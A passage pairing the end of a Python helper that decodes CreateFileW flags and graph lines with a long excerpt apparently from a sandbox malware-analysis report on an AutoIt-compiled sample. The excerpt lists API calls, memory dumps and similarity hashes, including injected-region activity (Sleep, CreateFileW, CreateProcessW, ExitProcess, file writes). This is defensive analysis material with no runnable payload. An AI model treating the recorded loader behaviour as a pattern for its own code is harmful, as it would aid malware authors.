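SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
         0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED"}


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    """Names of the set bits in value; unknown bits are kept as a hex remainder."""
    names = [name for bit, name in table.items() if value & bit == bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(f"0x{value & ~known:x}")
    return names or ["0"]


def decode_create_file(api_line: str) -> Dict[str, object]:
    """Decode a 'CreateFileW.KERNEL32(...), ref: <addr>' line from the report."""
    m = re.search(r"CreateFileW\.\w+\(([^)]*)\), ref: ([0-9A-Fa-f]+)", api_line)
    args = m.group(1).split(",")
    hexval = lambda s: None if s == "?" else int(s, 16)   # "?" = unresolved
    access, share, _sa, disp, flags, _template = [hexval(a) for a in args[1:7]]
    return {
        "call_site": int(m.group(2), 16),
        "lpFileName": args[0],
        "dwDesiredAccess": _bits(access, GENERIC),
        "dwShareMode": _bits(share, SHARE),
        "dwCreationDisposition": DISPOSITION.get(disp, f"0x{disp:x}"),
        "dwFlagsAndAttributes": _bits(flags, FLAGS),
    }


if __name__ == "__main__":
    g = parse_cfg(CFG_LINE)
    print("calls on the success path:", api_sequence(g, 2462, 2482))
    print("first CreateFileW:", decode_create_file(API_LINE))
```

Run as-is it lists the success path from the entry block to the VirtualFree block and prints the first open as GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL with an unresolved file name. The same parser handles the shorter graph lines elsewhere on the page, including the `CreateWindowExW * 2` repetition notation of the 4039d5 block.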

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 2493 40407c-404092 2494 404098-4040ad call 407a16 2493->2494 2495 40416f-404173 2493->2495 2498 4040b3-4040d3 call 407bcc 2494->2498 2499 43d3c8-43d3d7 LoadStringW 2494->2499 2501 43d3e2-43d3fa call 407b2e call 406fe3 2498->2501 2504 4040d9-4040dd 2498->2504 2499->2501 2511 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2501->2511 2515 43d400-43d41e call 407cab call 406fe3 call 407cab 2501->2515 2505 4040e3-4040e8 call 407b2e 2504->2505 2506 404174-40417d call 408047 2504->2506 2505->2511 2506->2511 2511->2495 2515->2511
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• _memset.LIBCMT ref: 004040FC
• _wcscpy.LIBCMT ref: 00404150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
• Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
• Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
• Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
• Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F

Control-flow Graph: [graph figure omitted; legend: Executed / Not Executed]
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
• Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
APIs
  • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
• _free.LIBCMT ref: 0043E263
• _free.LIBCMT ref: 0043E2AA
  • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
• Opcode ID: 25f7fc4f1835b3533dd58efb0dfe797f6598f87ef585f97ea147526d1d8effbf
• Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
• Opcode Fuzzy Hash: 25f7fc4f1835b3533dd58efb0dfe797f6598f87ef585f97ea147526d1d8effbf
• Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
APIs
  • Part of subcall function 00BF82F0: Sleep.KERNEL32(000001F4), ref: 00BF8301
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BF84FF
Strings
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: OJYYVSZ8BPB5
• API String ID: 2694422964-3797447477
• Opcode ID: 13facc4e1aa80b72e9722433d578ab95797f1d33699e802ef6a0de907f4d8aab
• Instruction ID: c0fb8bcb8f275bd194bd3816874bcb287dfee9fa5607e5501194157c0c5fb44b
• Opcode Fuzzy Hash: 13facc4e1aa80b72e9722433d578ab95797f1d33699e802ef6a0de907f4d8aab
• Instruction Fuzzy Hash: 84515D31D04249DBEF10DBA4C855BFFBBB9AF14300F104598E619BB2C0DA795B49CBA5
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
• RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
• Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
• Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
• Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
APIs
  • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
• _free.LIBCMT ref: 004696A2
• _free.LIBCMT ref: 004696A9
• _free.LIBCMT ref: 00469714
  • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
  • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
• _free.LIBCMT ref: 0046971C
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
• Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
• Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
• Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2782032738-0
                                                                                                                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                  • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                                                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                  • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointerEx.KERNEL32 ref: 00A7B2BA
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00A7B2E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 539440098-0
                                                                                                                                                  • Opcode ID: 914e9deca51aa87190b688071deee23e0e06df5423ab2a3f5a6c2056b23a48d9
                                                                                                                                                  • Instruction ID: a01bac3717b4caceea9ced8e22e9d5ceadec641c722978d640579404d48ed454
                                                                                                                                                  • Opcode Fuzzy Hash: 914e9deca51aa87190b688071deee23e0e06df5423ab2a3f5a6c2056b23a48d9
                                                                                                                                                  • Instruction Fuzzy Hash: 173184F052D384AED7118B698C1976FBFE06F92714F48C64DE4DC8A692D3B4884887B3
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID: AU3!P/I$EA06
                                                                                                                                                  • API String ID: 4104443479-1914660620
                                                                                                                                                  • Opcode ID: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
                                                                                                                                                  • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                                                                                  • Opcode Fuzzy Hash: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
                                                                                                                                                  • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0043EA39
                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                                                                                    • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                    • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 3777226403-3081909835
                                                                                                                                                  • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                  • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                                                                                  • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                  • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                                  • String ID: EA06
                                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                                  • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                  • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                                                                                  • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                  • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00BF7045
                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 00BF7064
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CreateExit
                                                                                                                                                  • String ID: D
                                                                                                                                                  • API String ID: 126409537-2746444292
                                                                                                                                                  • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                                                  • Instruction ID: 358a8450469b04af050bc7c8570ea222f40293300f954189be7e3c66a4a38df3
                                                                                                                                                  • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                                                  • Instruction Fuzzy Hash: 64F0C97154424CABDB60DFE0CC49FFE77B8AF08701F148548BB0A9B180DE7896088B61
                                                                                                                                                  APIs
                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                  • String ID: aut
                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                  • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                  • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                                                                                  • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                  • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                                                                                  Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
• Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
• Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
• Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 723eec8b487743482e9827446a2c7cbe8d875dc3e3ae071c13211d5d2b26e432
• Instruction ID: a8086a25094294fda138e7589ad9da18f7d8572831b80601d1315e771135367e
• Opcode Fuzzy Hash: 723eec8b487743482e9827446a2c7cbe8d875dc3e3ae071c13211d5d2b26e432
• Instruction Fuzzy Hash: B321F53576D3407FEE3567148C06FBD3AF46FA2710F884889F488591D2E5686C088A73
APIs
• _memset.LIBCMT ref: 00404370
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
• Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
• Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
• Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
• Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
APIs
• __FF_MSGBANNER.LIBCMT ref: 00425733
  • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
  • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
• __NMSG_WRITE.LIBCMT ref: 0042573A
  • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
  • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
